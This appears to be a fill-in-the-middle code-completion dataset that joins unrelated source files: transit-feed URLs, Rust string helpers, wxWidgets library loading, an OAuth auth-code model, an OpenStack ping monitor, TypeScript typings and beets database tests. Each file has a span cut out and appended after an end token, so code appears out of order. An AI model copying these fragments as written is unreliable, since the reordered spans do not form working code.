cape_ann_url, 'cape_cod.zip': cape_cod_url, 'franklin.zip': franklin_url, 'attleboro.zip': attleboro_url, 'lowell.zip': lowell_url, 'merrimack.zip': merrimack_url, 'metrowest.zip': metrowest_url, 'montachusett.zip': montachusett_url, 'nantucket.zip': nantucket_url, 'pioneer_valley.zip': pioneer_valley_url, 'southeastern_ma.zip': southeastern_url, 'vineyard_ma.zip': vineyard_url, 'worchester.zip': worchester_url, 'ma_ferries.zip': ma_ferry_url, 'bloom_ma.zip': bloom_url, 'boston_express.zip': boston_express_url, 'coach_bus_ma.zip': coach_bus_url, 'dattco_ma.zip': dattco_url, 'peter_pan_ma.zip': peter_pan_url, 'plymouth_brockton_rail.zip': plymouth_brockton_railway_url, 'yankee_ma.zip': yankee_url }<|fim▁end|>
peter_pan_url = '%speter_pan_google_transit.zip' % BASE_URL plymouth_brockton_railway_url = '%sPB_google_transit.zip' % BASE_URL yankee_url = '%syankee_google_transit.zip' % BASE_URL
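# Illustrative sketch of consuming a url map shaped like self.urls above. The
# FeedSource base class is not shown in this sample, so no Massdot instance is
# created here; the loop only needs a plain dict.
sample_urls = {
    'berkshire.zip': 'http://www.massdot.state.ma.us/Portals/0/docs/developers/brta_google_transit.zip',
    'pioneer_valley.zip': 'http://www.pvta.com/g_trans/google_transit.zip',
}
for filename, url in sorted(sample_urls.items()):
    print('%s <- %s' % (filename, url))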
<|file_name|>common.rs<|end_file_name|><|fim▁begin|>use std::ffi::CString; use std::os::raw::c_char; #[macro_export] macro_rules! take_until_and_consume ( ( $i:expr, $needle:expr ) => ( { let input: &[u8] = $i; let (rem, res) = ::nom::take_until!(input, $needle)?; let (rem, _) = ::nom::take!(rem, $needle.len())?; Ok((rem, res)) } ); ); #[cfg(not(feature = "debug-validate"))] #[macro_export] macro_rules! debug_validate_bug_on ( ($item:expr) => {}; ); #[cfg(feature = "debug-validate")] #[macro_export] macro_rules! debug_validate_bug_on ( ($item:expr) => { if $item { panic!("Condition check failed"); } }; ); #[cfg(not(feature = "debug-validate"))] #[macro_export] macro_rules! debug_validate_fail ( ($msg:expr) => {}; ); #[cfg(feature = "debug-validate")] #[macro_export] macro_rules! debug_validate_fail ( ($msg:expr) => { // Wrap in a conditional to prevent unreachable code warning in caller. if true { panic!($msg); } }; ); /// Convert a String to C-compatible string /// /// This function will consume the provided data and use the underlying bytes to construct a new /// string, ensuring that there is a trailing 0 byte. This trailing 0 byte will be appended by this /// function; the provided data should *not* contain any 0 bytes in it. /// /// Returns a valid pointer, or NULL pub fn rust_string_to_c(s: String) -> *mut c_char { CString::new(s) .map(|c_str| c_str.into_raw()) .unwrap_or(std::ptr::null_mut()) } /// Free a CString allocated by Rust (for ex. using `rust_string_to_c`)<|fim▁hole|>/// s must be allocated by rust, using `CString::new` #[no_mangle] pub unsafe extern "C" fn rs_cstring_free(s: *mut c_char) { if s.is_null() { return; } drop(CString::from_raw(s)); }<|fim▁end|>
/// /// # Safety ///
<|file_name|>dynlib.cpp<|end_file_name|><|fim▁begin|>///////////////////////////////////////////////////////////////////////////// // Name: src/common/dynlib.cpp // Purpose: Dynamic library management // Author: Guilhem Lavaux // Modified by: // Created: 20/07/98 // Copyright: (c) 1998 Guilhem Lavaux // 2000-2005 Vadim Zeitlin // Licence: wxWindows licence ///////////////////////////////////////////////////////////////////////////// //FIXME: This class isn't really common at all, it should be moved into // platform dependent files (already done for Windows and Unix) // ============================================================================ // declarations // ============================================================================ // ---------------------------------------------------------------------------- // headers // ---------------------------------------------------------------------------- #include "wx/wxprec.h" #if wxUSE_DYNLIB_CLASS #include "wx/dynlib.h" #ifndef WX_PRECOMP #include "wx/intl.h" #include "wx/log.h" #include "wx/app.h" #include "wx/utils.h" #endif //WX_PRECOMP #include "wx/filefn.h" #include "wx/filename.h" // for SplitPath() #include "wx/platinfo.h" #include "wx/arrimpl.cpp" WX_DEFINE_USER_EXPORTED_OBJARRAY(wxDynamicLibraryDetailsArray) // ============================================================================ // implementation // ============================================================================ // --------------------------------------------------------------------------- // wxDynamicLibrary // --------------------------------------------------------------------------- // for MSW/Unix it is defined in platform-specific file #if !(defined(__WINDOWS__) || defined(__UNIX__)) wxDllType wxDynamicLibrary::GetProgramHandle() { wxFAIL_MSG( wxT("GetProgramHandle() is not implemented under this platform")); return 0; } #endif // __WINDOWS__ || __UNIX__ bool wxDynamicLibrary::Load(const wxString& libnameOrig, int flags) { wxASSERT_MSG(m_handle == 0, wxT("Library already loaded.")); // add the proper extension for the DLL ourselves unless told not to wxString libname = libnameOrig; if ( !(flags & wxDL_VERBATIM) ) { // and also check that the libname doesn't already have it wxString ext; wxFileName::SplitPath(libname, NULL, NULL, &ext); if ( ext.empty() ) { libname += GetDllExt(wxDL_MODULE); } } m_handle = RawLoad(libname, flags); if ( m_handle == 0 && !(flags & wxDL_QUIET) ) { ReportError(_("Failed to load shared library '%s'"), libname); } return IsLoaded(); } void *wxDynamicLibrary::DoGetSymbol(const wxString &name, bool *success) const { wxCHECK_MSG( IsLoaded(), NULL, wxT("Can't load symbol from unloaded library") ); void *symbol = RawGetSymbol(m_handle, name); if ( success ) *success = symbol != NULL; return symbol; } void *wxDynamicLibrary::GetSymbol(const wxString& name, bool *success) const { void *symbol = DoGetSymbol(name, success); if ( !symbol ) { ReportError(_("Couldn't find symbol '%s' in a dynamic library"), name); } return symbol; } // ---------------------------------------------------------------------------- // informational methods // ---------------------------------------------------------------------------- /*static*/ wxString wxDynamicLibrary::GetDllExt(wxDynamicLibraryCategory cat) { wxUnusedVar(cat); #if defined(__WINDOWS__) return ".dll"; #elif defined(__HPUX__) return ".sl"; #elif defined(__DARWIN__) switch ( cat ) { case wxDL_LIBRARY: return ".dylib"; case wxDL_MODULE: return ".bundle"; } wxFAIL_MSG("unreachable"); return 
wxString(); // silence gcc warning #else return ".so"; #endif } /*static*/ wxString wxDynamicLibrary::CanonicalizeName(const wxString& name, wxDynamicLibraryCategory cat) { wxString nameCanonic; <|fim▁hole|> { case wxDL_LIBRARY: // Library names should start with "lib" under Unix. nameCanonic = "lib"; break; case wxDL_MODULE: // Module names are arbitrary and should have no prefix added. break; } #endif nameCanonic << name << GetDllExt(cat); return nameCanonic; } /*static*/ wxString wxDynamicLibrary::CanonicalizePluginName(const wxString& name, wxPluginCategory cat) { wxString suffix; if ( cat == wxDL_PLUGIN_GUI ) { suffix = wxPlatformInfo::Get().GetPortIdShortName(); } #if wxUSE_UNICODE suffix << wxT('u'); #endif #ifdef __WXDEBUG__ suffix << wxT('d'); #endif if ( !suffix.empty() ) suffix = wxString(wxT("_")) + suffix; #define WXSTRINGIZE(x) #x #if defined(__UNIX__) #if (wxMINOR_VERSION % 2) == 0 #define wxDLLVER(x,y,z) "-" WXSTRINGIZE(x) "." WXSTRINGIZE(y) #else #define wxDLLVER(x,y,z) "-" WXSTRINGIZE(x) "." WXSTRINGIZE(y) "." WXSTRINGIZE(z) #endif #else #if (wxMINOR_VERSION % 2) == 0 #define wxDLLVER(x,y,z) WXSTRINGIZE(x) WXSTRINGIZE(y) #else #define wxDLLVER(x,y,z) WXSTRINGIZE(x) WXSTRINGIZE(y) WXSTRINGIZE(z) #endif #endif suffix << wxString::FromAscii(wxDLLVER(wxMAJOR_VERSION, wxMINOR_VERSION, wxRELEASE_NUMBER)); #undef wxDLLVER #undef WXSTRINGIZE #ifdef __WINDOWS__ // Add compiler identification: #if defined(__GNUG__) suffix << wxT("_gcc"); #elif defined(__VISUALC__) suffix << wxT("_vc"); #endif #endif return CanonicalizeName(name + suffix, wxDL_MODULE); } /*static*/ wxString wxDynamicLibrary::GetPluginsDirectory() { #ifdef __UNIX__ wxString format = wxGetInstallPrefix(); if ( format.empty() ) return wxEmptyString; wxString dir; format << wxFILE_SEP_PATH << wxT("lib") << wxFILE_SEP_PATH << wxT("wx") << wxFILE_SEP_PATH #if (wxMINOR_VERSION % 2) == 0 << wxT("%i.%i"); dir.Printf(format.c_str(), wxMAJOR_VERSION, wxMINOR_VERSION); #else << wxT("%i.%i.%i"); dir.Printf(format.c_str(), wxMAJOR_VERSION, wxMINOR_VERSION, wxRELEASE_NUMBER); #endif return dir; #else // ! __UNIX__ return wxEmptyString; #endif } #endif // wxUSE_DYNLIB_CLASS<|fim▁end|>
// under Unix the library names usually start with "lib" prefix, add it #if defined(__UNIX__) switch ( cat )
<|file_name|>authcodes.js<|end_file_name|><|fim▁begin|>module.exports = function(app) { var _env = app.get('env'); var _log = app.lib.logger; var _mongoose = app.core.mongo.mongoose; var _group = 'MODEL:oauth.authcodes'; var Schema = { authCode : {type: String, required: true, unique: true, alias: 'authCode'}, clientId : {type: String, alias: 'clientId'}, userId : {type: String, required: true, alias: 'userId'}, expires : {type: Date, alias: 'expires'} }; var AuthCodesSchema = app.core.mongo.db.Schema(Schema);<|fim▁hole|> // statics AuthCodesSchema.method('getAuthCode', function(authCode, cb) { var AuthCodes = _mongoose.model('Oauth_AuthCodes'); AuthCodes.findOne({authCode: authCode}, cb); }); AuthCodesSchema.method('saveAuthCode', function(code, clientId, expires, userId, cb) { var AuthCodes = _mongoose.model('Oauth_AuthCodes'); if (userId.id) userId = userId.id; var fields = { clientId : clientId, userId : userId, expires : expires }; AuthCodes.update({authCode: code}, fields, {upsert: true}, function(err) { if (err) _log.error(_group, err); cb(err); }); }); return _mongoose.model('Oauth_AuthCodes', AuthCodesSchema); };<|fim▁end|>
<|file_name|>index.js<|end_file_name|><|fim▁begin|>describe("BASIC CRUD SCENARIOS", function() { require("./basic"); }); describe("VALIDATE CRUD SCENARIOS", function() { require("./validation"); }); describe("REPORT SCENARIOS", function() { require("./report");<|fim▁hole|><|fim▁end|>
});
<|file_name|>ping_working_public.py<|end_file_name|><|fim▁begin|>#! /usr/bin/python # @author: wtie import subprocess import sys import time import argparse DIFF = False FIRST = [] def get_floating_ips(): sql = """SELECT fip.floating_ip_address FROM neutron.floatingips AS fip JOIN neutron.ports AS p JOIN neutron.securitygroupportbindings AS sgb JOIN neutron.securitygrouprules AS sgr JOIN ( SELECT ins.uuid , Count(p.id) AS count FROM nova.instances AS ins JOIN neutron.ports AS p where ins.uuid=p.device_id AND ins.deleted=0 AND ins.vm_state='active' AND ins.task_state IS NULL GROUP BY ins.uuid ) AS i WHERE fip.fixed_port_id=p.id AND p.admin_state_up=1 AND sgb.port_id=p.id AND sgb.security_group_id=sgr.security_group_id AND sgr.direction='ingress' AND sgr.protocol='icmp' AND sgr.remote_ip_prefix='0.0.0.0/0' AND p.device_id=i.uuid AND i.count=1;""" floating_ips = [ip for ip in subprocess.Popen( ["mysql", "-sNe", sql], stdout=subprocess.PIPE).communicate()[0].split("\n") if ip] return floating_ips def get_public_ips(net_uuid): if not net_uuid: return None sql = """SELECT ipa.ip_address<|fim▁hole|>JOIN ( SELECT ins.uuid , Count(p.id) AS count FROM nova.instances AS ins JOIN neutron.ports AS p where ins.uuid=p.device_id AND ins.deleted=0 AND ins.vm_state='active' AND ins.task_state IS NULL GROUP BY ins.uuid ) AS i WHERE ipa.network_id='""" + net_uuid + """' AND ipa.port_id=p.id AND p.admin_state_up=1 AND p.device_owner LIKE "compute:%" AND sgb.port_id=p.id AND sgb.security_group_id=sgr.security_group_id AND sgr.direction='ingress' AND sgr.protocol='icmp' AND sgr.remote_ip_prefix='0.0.0.0/0' AND p.device_id=i.uuid AND i.count=1;""" public_ips = [ip for ip in subprocess.Popen( ["mysql", "-sNe", sql], stdout=subprocess.PIPE).communicate()[0].split("\n") if ip] return public_ips def ping(ip): return subprocess.call(["ping", "-c", "1", "-w", "1", ip], stdout=subprocess.PIPE, stderr=subprocess.PIPE) def ping_loop(net_uuid=None): pingable_ips = get_public_ips(net_uuid) if net_uuid else [] pingable_ips += get_floating_ips() total = len(pingable_ips) fail_list = [] global DIFF global FIRST for ip in pingable_ips: if DIFF and FIRST and ip in FIRST: result = "?" 
else: result = ping(ip) sys.stdout.write(str(result)) sys.stdout.flush() if result == 1: fail_list.append(ip) # simple way to remove duplicate IPs; could be improved fail_list = list(set(fail_list)) if DIFF: if FIRST: diff_list = [ip for ip in fail_list if ip not in FIRST] print "\n@DIFF: [%s] %s/%s: %s" % (total, len(diff_list), len(fail_list), diff_list) else: FIRST = fail_list print "\nFIRST: [%s] %s/%s: %s" % (total, len(fail_list), len(fail_list), fail_list) else: print "\n[%s] %s: %s" % (total, len(fail_list), fail_list) return fail_list def print_report(failed_map, least_interval): report = {} for ip in failed_map: if failed_map[ip] in report: report[failed_map[ip]].append(ip) else: report[failed_map[ip]] = [ip] print "REPORT:\n" for count in report: outage = least_interval * (count - 1) print("~%s :\n %s\n" % (outage, report[count])) if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument("--net_id", help="Include network <net-id>") parser.add_argument("--diff", action="store_true", help="Only print IPs that differ from the first round", default=False) args = parser.parse_args() public_network_uuid = args.net_id if args.net_id else None least_interval = 10 if args.diff: DIFF = True failed_map = {} while True: try: start = time.time() print time.strftime("%x %X") fail_list = ping_loop(public_network_uuid) for ip in fail_list: if ip in failed_map: failed_map[ip] += 1 else: failed_map[ip] = 1 end = time.time() if (end-start) < least_interval: time.sleep(least_interval - (end-start)) except KeyboardInterrupt: print_report(failed_map, least_interval) sys.exit(0)<|fim▁end|>
FROM neutron.ports AS p JOIN neutron.ipallocations AS ipa JOIN neutron.securitygroupportbindings AS sgb JOIN neutron.securitygrouprules AS sgr
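# Worked example of the reporting arithmetic above, with invented values: at
# least_interval = 10, an IP that failed in 4 rounds lands in the count-4
# bucket and is reported as roughly 10 * (4 - 1) = 30 seconds of outage.
least_interval = 10
failed_map = {'10.0.0.5': 4, '10.0.0.9': 4, '10.0.0.7': 1}
report = {}
for ip, count in failed_map.items():
    report.setdefault(count, []).append(ip)
for count in sorted(report):
    print('~%ss : %s' % (least_interval * (count - 1), sorted(report[count])))
# ~0s : ['10.0.0.7']
# ~30s : ['10.0.0.5', '10.0.0.9']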
<|file_name|>factories.py<|end_file_name|><|fim▁begin|>import factory from dominion.games.models import Game <|fim▁hole|> class Meta: model = Game<|fim▁end|>
class GameFactory(factory.django.DjangoModelFactory):
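# A short, hypothetical usage sketch for the factory above. It assumes a
# configured Django project (settings, database) so the ORM can save rows,
# which is why the calls are shown commented out rather than executed.
#
# game = GameFactory()                 # build and save one Game row
# games = GameFactory.create_batch(3)  # three saved instances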
<|file_name|>contacts.interface.ts<|end_file_name|><|fim▁begin|>export interface IContact { id?: number; email: string;<|fim▁hole|><|fim▁end|>
listName: string; name: string; }
<|file_name|>inspector.py<|end_file_name|><|fim▁begin|>import sys from arrowhead.core import Step from arrowhead.core import ErrorArrow from arrowhead.core import NormalArrow from arrowhead.core import ValueArrow def print_flow_state(flow, active_step_name=None, file=sys.stdout): """ Display the state of a given flow.<|fim▁hole|> (optional) name of the active step :param file: (optional) file to print to (defaults to sys.stdout) This function actually prints() a developer-friendly version of the state of the entire flow. The output is composed of many lines. The output will contain all of the internal state of the flow (may print stuff like passwords if you stored any). """ # show flow name print("[{}]".format(flow.Meta.name).center(40, "~"), file=file) # show flow global state needs_header = True for f_k, f_v in flow.__dict__.items(): # private stuff is private if f_k.startswith("_"): continue # steps are handled later if (isinstance(f_v, Step) or (isinstance(f_v, type) and issubclass(f_v, Step))): continue # skip Meta if f_k == 'Meta': continue if needs_header: print("STATE:", file=file) needs_header = False print("{indent}{key}: {value!r}".format( indent=" " * 4, key=f_k, value=f_v ), file=file) # show a list of all the steps, their state as well as a marker that # shows where we actively are print("STEPS:", file=file) for name in flow.Meta.steps.keys(): step = getattr(flow, name) flags = [] if step.Meta.accepting: flags.append('A') if step.Meta.initial == name: flags.append('I') if flags: rendered_flags = " ({})".format(''.join(flags)) else: rendered_flags = "" if step.Meta.name == active_step_name: indent = " => " else: indent = " " print("{indent}{step}{flags:4}".format( indent=indent, flags=rendered_flags, step=step.Meta.label ), file=file) needs_header = False for s_k, s_v in step.__dict__.items(): if s_k.startswith("_"): continue # skip Meta if s_k == 'Meta': continue if needs_header: print("STATE:", file=file) needs_header = False print("{indent}{key}: {value!r}".format( indent=" " * 8, key=s_k, value=s_v ), file=file) print("." * 40, file=file) def print_dot_graph(flow, active_step_name=None, file=sys.stdout): """ Print the dot(1) description of a given flow. :param flow: A Flow, instance or class :param active_step_name: (optional) name of the active step :param file: (optional) file to print to (defaults to sys.stdout) """ print('digraph {', file=file) print('\tnode [shape=box, color=black];', file=file) print('\tedge [arrowsize=0.5];', file=file) print(file=file) print('\tsubgraph {', file=file) print('\t\tnode [shape=plaintext];', file=file) # NOTE: levels + 2 because 0 and max are # for _start and _end that are not # represented anywhere in the flow. 
We # just add them for graphviz print('\t\t{};'.format( ' -> '.join(str(i) for i in range(flow.Meta.levels + 2)) ), file=file) print('\t}', file=file) print(file=file) # NOTE: levels + 2 as above levels = {i: [] for i in range(flow.Meta.levels + 2)} levels[0].append('_start') # NOTE: levels + 1 is the last element levels[flow.Meta.levels + 1].append('_end') for step in flow.Meta.steps.values(): levels[step.Meta.level].append(step.Meta.name) for level, steps in sorted(levels.items()): print('\t{{ rank=same; {}; {}; }}'.format( level, '; '.join(steps) ), file=file) print(file=file) if active_step_name == '_start': print('\t_start [shape=circle, style=filled,' ' fillcolor=blue, label=""];', file=file) else: print('\t_start [shape=circle, style=filled,' ' fillcolor=black, label=""];', file=file) for step in flow.Meta.steps.values(): if step.Meta.initial: print('\t_start -> {};'.format(step.Meta.name), file=file) print(file=file) for step in flow.Meta.steps.values(): if active_step_name == step.Meta.name: print('\t{} [shape={}, label="{}", style=filled, fillcolor=blue, fontcolor=white];'.format( step.Meta.name, "box", step.Meta.label.replace('"', '\\"') ), file=file) else: print('\t{} [shape={}, label="{}"];'.format( step.Meta.name, "box", step.Meta.label.replace('"', '\\"') ), file=file) for arrow in step.Meta.arrows: if isinstance(arrow, NormalArrow): print('\t{} -> {};'.format( step.Meta.name, arrow.target ), file=file) elif isinstance(arrow, ValueArrow): print('\t{} -> {} [label="{}", color=green];'.format( step.Meta.name, arrow.target, arrow.value ), file=file) elif isinstance(arrow, ErrorArrow): print('\t{} -> {} [label="{}", color=red];'.format( step.Meta.name, arrow.target, arrow.error.__name__ ), file=file) print(file=file) if active_step_name == '_end': print('\t_end [shape=doublecircle, style=filled, ' 'fillcolor=blue, label=""];', file=file) else: print('\t_end [shape=doublecircle, style=filled, ' 'fillcolor=black, label=""];', file=file) for step in flow.Meta.steps.values(): if step.Meta.accepting: print('\t{} -> _end;'.format(step.Meta.name), file=file) print("}", file=file)<|fim▁end|>
:param flow: A Flow, instance or class :param active_step_name:
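# Sketch of rendering the dot output above with Graphviz; `my_flow` stands in
# for an arrowhead Flow instance, which this sample does not construct, so the
# snippet is illustrative rather than directly executable.
#
# import subprocess
# with open('flow.dot', 'w') as fh:
#     print_dot_graph(my_flow, active_step_name=None, file=fh)
# subprocess.check_call(['dot', '-Tpng', 'flow.dot', '-o', 'flow.png'])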
<|file_name|>tsd.d.ts<|end_file_name|><|fim▁begin|>/// <reference path="empower/empower.d.ts" /> /// <reference path="mocha/mocha.d.ts" /> /// <reference path="power-assert-formatter/power-assert-formatter.d.ts" /> /// <reference path="power-assert/power-assert.d.ts" /> /// <reference path="node/node.d.ts" /><|fim▁hole|> declare module 'vdom-parser' { var parse: any; export default parse; } declare module 'matches-selector' { var selector: any; export default selector; }<|fim▁end|>
/// <reference path="virtual-dom/virtual-dom.d.ts" />
<|file_name|>callbacks.js<|end_file_name|><|fim▁begin|>function alertThanks (post) { alert("Thanks for submitting a post!"); return post; }<|fim▁hole|><|fim▁end|>
Telescope.callbacks.add("postSubmitClient", alertThanks);
<|file_name|>test_dbcore.py<|end_file_name|><|fim▁begin|># This file is part of beets. # Copyright 2016, Adrian Sampson. # # Permission is hereby granted, free of charge, to any person obtaining # a copy of this software and associated documentation files (the # "Software"), to deal in the Software without restriction, including # without limitation the rights to use, copy, modify, merge, publish, # distribute, sublicense, and/or sell copies of the Software, and to # permit persons to whom the Software is furnished to do so, subject to # the following conditions: # # The above copyright notice and this permission notice shall be # included in all copies or substantial portions of the Software. """Tests for the DBCore database abstraction. """ import os import shutil import sqlite3 import unittest from test import _common from beets import dbcore from tempfile import mkstemp # Fixture: concrete database and model classes. For migration tests, we # have multiple models with different numbers of fields. class SortFixture(dbcore.query.FieldSort): pass class QueryFixture(dbcore.query.Query): def __init__(self, pattern): self.pattern = pattern def clause(self): return None, () def match(self): return True class ModelFixture1(dbcore.Model): _table = 'test' _flex_table = 'testflex' _fields = { 'id': dbcore.types.PRIMARY_ID, 'field_one': dbcore.types.INTEGER, 'field_two': dbcore.types.STRING, } _types = { 'some_float_field': dbcore.types.FLOAT, } _sorts = { 'some_sort': SortFixture, } _queries = { 'some_query': QueryFixture, } @classmethod def _getters(cls): return {} def _template_funcs(self): return {} class DatabaseFixture1(dbcore.Database): _models = (ModelFixture1,) pass class ModelFixture2(ModelFixture1): _fields = { 'id': dbcore.types.PRIMARY_ID, 'field_one': dbcore.types.INTEGER, 'field_two': dbcore.types.INTEGER, } class DatabaseFixture2(dbcore.Database): _models = (ModelFixture2,) pass class ModelFixture3(ModelFixture1): _fields = { 'id': dbcore.types.PRIMARY_ID, 'field_one': dbcore.types.INTEGER, 'field_two': dbcore.types.INTEGER, 'field_three': dbcore.types.INTEGER, } class DatabaseFixture3(dbcore.Database): _models = (ModelFixture3,) pass class ModelFixture4(ModelFixture1): _fields = { 'id': dbcore.types.PRIMARY_ID, 'field_one': dbcore.types.INTEGER, 'field_two': dbcore.types.INTEGER, 'field_three': dbcore.types.INTEGER, 'field_four': dbcore.types.INTEGER, } class DatabaseFixture4(dbcore.Database): _models = (ModelFixture4,) pass class AnotherModelFixture(ModelFixture1): _table = 'another' _flex_table = 'anotherflex' _fields = { 'id': dbcore.types.PRIMARY_ID, 'foo': dbcore.types.INTEGER, } class ModelFixture5(ModelFixture1): _fields = { 'some_string_field': dbcore.types.STRING, 'some_float_field': dbcore.types.FLOAT, 'some_boolean_field': dbcore.types.BOOLEAN, } class DatabaseFixture5(dbcore.Database): _models = (ModelFixture5,) pass class DatabaseFixtureTwoModels(dbcore.Database): _models = (ModelFixture2, AnotherModelFixture) pass class ModelFixtureWithGetters(dbcore.Model): @classmethod def _getters(cls): return {'aComputedField': (lambda s: 'thing')} def _template_funcs(self): return {} @_common.slow_test() class MigrationTest(unittest.TestCase): """Tests the ability to change the database schema between versions. """ @classmethod def setUpClass(cls): handle, cls.orig_libfile = mkstemp('orig_db') os.close(handle) # Set up a database with the two-field schema. old_lib = DatabaseFixture2(cls.orig_libfile) # Add an item to the old library. 
old_lib._connection().execute( 'insert into test (field_one, field_two) values (4, 2)' ) old_lib._connection().commit() del old_lib @classmethod def tearDownClass(cls): os.remove(cls.orig_libfile) def setUp(self): handle, self.libfile = mkstemp('db') os.close(handle) shutil.copyfile(self.orig_libfile, self.libfile) def tearDown(self): os.remove(self.libfile) def test_open_with_same_fields_leaves_untouched(self): new_lib = DatabaseFixture2(self.libfile) c = new_lib._connection().cursor() c.execute("select * from test") row = c.fetchone() self.assertEqual(len(row.keys()), len(ModelFixture2._fields)) def test_open_with_new_field_adds_column(self): new_lib = DatabaseFixture3(self.libfile) c = new_lib._connection().cursor() c.execute("select * from test") row = c.fetchone() self.assertEqual(len(row.keys()), len(ModelFixture3._fields)) def test_open_with_fewer_fields_leaves_untouched(self): new_lib = DatabaseFixture1(self.libfile) c = new_lib._connection().cursor() c.execute("select * from test") row = c.fetchone() self.assertEqual(len(row.keys()), len(ModelFixture2._fields)) def test_open_with_multiple_new_fields(self): new_lib = DatabaseFixture4(self.libfile) c = new_lib._connection().cursor() c.execute("select * from test") row = c.fetchone() self.assertEqual(len(row.keys()), len(ModelFixture4._fields)) def test_extra_model_adds_table(self): new_lib = DatabaseFixtureTwoModels(self.libfile) try: new_lib._connection().execute("select * from another") except sqlite3.OperationalError: self.fail("select failed") class TransactionTest(unittest.TestCase): def setUp(self): self.db = DatabaseFixture1(':memory:') def tearDown(self): self.db._connection().close() def test_mutate_increase_revision(self): old_rev = self.db.revision with self.db.transaction() as tx: tx.mutate( 'INSERT INTO {} ' '(field_one) ' 'VALUES (?);'.format(ModelFixture1._table), (111,), ) self.assertGreater(self.db.revision, old_rev) def test_query_no_increase_revision(self): old_rev = self.db.revision with self.db.transaction() as tx: tx.query('PRAGMA table_info(%s)' % ModelFixture1._table) self.assertEqual(self.db.revision, old_rev) class ModelTest(unittest.TestCase): def setUp(self): self.db = DatabaseFixture1(':memory:') def tearDown(self): self.db._connection().close() def test_add_model(self): model = ModelFixture1() model.add(self.db) rows = self.db._connection().execute('select * from test').fetchall() self.assertEqual(len(rows), 1) def test_store_fixed_field(self): model = ModelFixture1() model.add(self.db) model.field_one = 123 model.store() row = self.db._connection().execute('select * from test').fetchone() self.assertEqual(row['field_one'], 123) def test_revision(self): old_rev = self.db.revision model = ModelFixture1() model.add(self.db) model.store() self.assertEqual(model._revision, self.db.revision) self.assertGreater(self.db.revision, old_rev) mid_rev = self.db.revision model2 = ModelFixture1() model2.add(self.db) model2.store() self.assertGreater(model2._revision, mid_rev) self.assertGreater(self.db.revision, model._revision) # revision changed, so the model should be re-loaded model.load() self.assertEqual(model._revision, self.db.revision) # revision did not change, so no reload mod2_old_rev = model2._revision model2.load() self.assertEqual(model2._revision, mod2_old_rev) def test_retrieve_by_id(self): model = ModelFixture1() model.add(self.db) other_model = self.db._get(ModelFixture1, model.id) self.assertEqual(model.id, other_model.id) def test_store_and_retrieve_flexattr(self): model = ModelFixture1() 
model.add(self.db) model.foo = 'bar' model.store() other_model = self.db._get(ModelFixture1, model.id) self.assertEqual(other_model.foo, 'bar') def test_delete_flexattr(self): model = ModelFixture1() model['foo'] = 'bar' self.assertTrue('foo' in model) del model['foo'] self.assertFalse('foo' in model) def test_delete_flexattr_via_dot(self): model = ModelFixture1() model['foo'] = 'bar' self.assertTrue('foo' in model) del model.foo self.assertFalse('foo' in model) def test_delete_flexattr_persists(self): model = ModelFixture1() model.add(self.db) model.foo = 'bar' model.store() model = self.db._get(ModelFixture1, model.id) del model['foo'] model.store() model = self.db._get(ModelFixture1, model.id) self.assertFalse('foo' in model) def test_delete_non_existent_attribute(self): model = ModelFixture1() with self.assertRaises(KeyError): del model['foo'] def test_delete_fixed_attribute(self): model = ModelFixture5() model.some_string_field = 'foo' model.some_float_field = 1.23 model.some_boolean_field = True for field, type_ in model._fields.items(): self.assertNotEqual(model[field], type_.null) for field, type_ in model._fields.items(): del model[field] self.assertEqual(model[field], type_.null) def test_null_value_normalization_by_type(self): model = ModelFixture1() model.field_one = None self.assertEqual(model.field_one, 0) def test_null_value_stays_none_for_untyped_field(self): model = ModelFixture1() model.foo = None self.assertEqual(model.foo, None) def test_normalization_for_typed_flex_fields(self): model = ModelFixture1() model.some_float_field = None self.assertEqual(model.some_float_field, 0.0) def test_load_deleted_flex_field(self): model1 = ModelFixture1() model1['flex_field'] = True model1.add(self.db) model2 = self.db._get(ModelFixture1, model1.id) self.assertIn('flex_field', model2) del model1['flex_field'] model1.store() model2.load() self.assertNotIn('flex_field', model2) def test_check_db_fails(self): with self.assertRaisesRegex(ValueError, 'no database'): dbcore.Model()._check_db() with self.assertRaisesRegex(ValueError, 'no id'): ModelFixture1(self.db)._check_db() dbcore.Model(self.db)._check_db(need_id=False) def test_missing_field(self): with self.assertRaises(AttributeError): ModelFixture1(self.db).nonExistingKey def test_computed_field(self): model = ModelFixtureWithGetters() self.assertEqual(model.aComputedField, 'thing') with self.assertRaisesRegex(KeyError, 'computed field .+ deleted'): del model.aComputedField def test_items(self): model = ModelFixture1(self.db) model.id = 5 self.assertEqual({('id', 5), ('field_one', 0), ('field_two', '')}, set(model.items())) def test_delete_internal_field(self): model = dbcore.Model() del model._db with self.assertRaises(AttributeError): model._db def test_parse_nonstring(self): with self.assertRaisesRegex(TypeError, "must be a string"): dbcore.Model._parse(None, 42) class FormatTest(unittest.TestCase): def test_format_fixed_field_integer(self): model = ModelFixture1() model.field_one = 155 value = model.formatted().get('field_one') self.assertEqual(value, '155') def test_format_fixed_field_integer_normalized(self): """The normalize method of the Integer class rounds floats """ model = ModelFixture1() model.field_one = 142.432 value = model.formatted().get('field_one') self.assertEqual(value, '142') model.field_one = 142.863 value = model.formatted().get('field_one') self.assertEqual(value, '143') def test_format_fixed_field_string(self): model = ModelFixture1() model.field_two = 'caf\xe9' value = model.formatted().get('field_two') 
self.assertEqual(value, 'caf\xe9') def test_format_flex_field(self): model = ModelFixture1() model.other_field = 'caf\xe9' value = model.formatted().get('other_field') self.assertEqual(value, 'caf\xe9') def test_format_flex_field_bytes(self): model = ModelFixture1() model.other_field = 'caf\xe9'.encode() value = model.formatted().get('other_field') self.assertTrue(isinstance(value, str)) self.assertEqual(value, 'caf\xe9') def test_format_unset_field(self): model = ModelFixture1() value = model.formatted().get('other_field') self.assertEqual(value, '') def test_format_typed_flex_field(self): model = ModelFixture1() model.some_float_field = 3.14159265358979 value = model.formatted().get('some_float_field') self.assertEqual(value, '3.1') class FormattedMappingTest(unittest.TestCase): def test_keys_equal_model_keys(self): model = ModelFixture1() formatted = model.formatted() self.assertEqual(set(model.keys(True)), set(formatted.keys())) def test_get_unset_field(self): model = ModelFixture1() formatted = model.formatted() with self.assertRaises(KeyError): formatted['other_field'] def test_get_method_with_default(self): model = ModelFixture1() formatted = model.formatted() self.assertEqual(formatted.get('other_field'), '') def test_get_method_with_specified_default(self): model = ModelFixture1() formatted = model.formatted() self.assertEqual(formatted.get('other_field', 'default'), 'default') class ParseTest(unittest.TestCase): def test_parse_fixed_field(self): value = ModelFixture1._parse('field_one', '2') self.assertIsInstance(value, int) self.assertEqual(value, 2) def test_parse_flex_field(self): value = ModelFixture1._parse('some_float_field', '2') 